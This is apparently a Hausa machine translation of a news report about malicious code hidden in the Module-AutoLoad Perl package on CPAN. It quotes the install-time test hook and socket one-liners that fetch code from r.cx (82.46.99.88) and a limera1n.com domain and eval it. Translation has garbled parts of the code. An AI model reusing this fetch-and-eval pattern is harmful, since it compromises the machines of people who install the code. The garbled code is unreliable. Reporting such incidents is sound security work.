ProHoster > Блог > labaran intanet > An gano lambar mugunta a cikin Kunshin Module-AutoLoad Perl

An gano lambar mugunta a cikin Kunshin Module-AutoLoad Perl

A cikin kunshin Perl da aka rarraba ta hanyar kundin adireshin CPAN Module-Load ɗin atomatik, an tsara shi don loda samfuran CPAN ta atomatik akan tashi, gano malic code. An shigar da mugunta samu a cikin lambar gwaji 05_rcx.t, wanda ke jigilar kaya tun 2011.
Yana da kyau cewa tambayoyi game da loda lambar tambaya ta tashi Stackoverflow dawo a 2016.

Ayyukan mugunta sun taso zuwa yunƙurin zazzagewa da aiwatar da lamba daga sabar ɓangare na uku (http://r.cx:1/) yayin aiwatar da babban ɗakin gwaji da aka ƙaddamar lokacin shigar da tsarin. Ana ɗauka cewa lambar da aka fara saukewa daga uwar garken waje ba ta da kyau ba, amma yanzu an tura buƙatar zuwa yankin ww.limera1n.com, wanda ke ba da sashinsa na lambar don aiwatarwa.

Don tsara zazzagewa a cikin fayil 05_rcx.t Ana amfani da lambar mai zuwa:

$prog na = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
gwadawa na = `$^X $prog`;

Ƙididdigan lambar yana sa a aiwatar da rubutun ../contrib/RCX.pl, abubuwan da ke ciki an rage su zuwa layi:

yi amfani da lib do{eval<$b>&&botstrap("RCX")if$b=sabon IO::Socket::INET 82.46.99.88.":1″};

Wannan rubutun yana lodi rude amfani da sabis perlobfuscator.com lambar daga mai masaukin baki r.cx (lambobin haruffa 82.46.99.88 sun dace da rubutun "R.cX") kuma suna aiwatar da shi a cikin madaidaicin toshe.

$ perl -MIO:: Socket -e'$b= sabon IO:: Socket:: INET 82.46.99.88.":1″; buga <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Bayan cire kayan, a ƙarshe ana aiwatar da waɗannan abubuwa: lambar:

buga {$b=sabon IO :: Socket :: INET"ww.limera1n.com:80″}"SAMU /iJailBreak
"; dawowar kwatankwacin gargadi $@yayin da$b;1

Yanzu an cire fakitin matsala daga ma'ajiyar. Dakata (Perl Authors Upload Server), kuma an toshe asusun marubucin mawallafin. A wannan yanayin, ƙirar har yanzu tana nan akwai a cikin Rumbun MetaCPAN kuma ana iya shigar dashi kai tsaye daga MetaCPAN ta amfani da wasu kayan aiki kamar cpanminus. An luracewa kunshin ba a rarraba ko'ina ba.

Ban sha'awa don tattaunawa hade da marubucin wannan manhaja, wanda ya musanta labarin cewa an shigar da malicious code bayan an kutse shafinsa na “r.cx” kuma ya bayyana cewa yana jin dadi ne kawai, kuma ya yi amfani da perlobfuscator.com ba don boye wani abu ba, amma don rage girman girman. na code da sauƙaƙa kwafinsa ta allon allo. Zaɓin sunan aikin "botstrap" an bayyana shi ta gaskiyar cewa wannan kalmar "ta yi kama da bot kuma ta fi guntu bootstrap." Marubucin tsarin ya kuma ba da tabbacin cewa magudin da aka gano ba sa yin munanan ayyuka, amma kawai yana nuna lodi da aiwatar da lambar ta hanyar TCP.

source: budenet.ru

Add a comment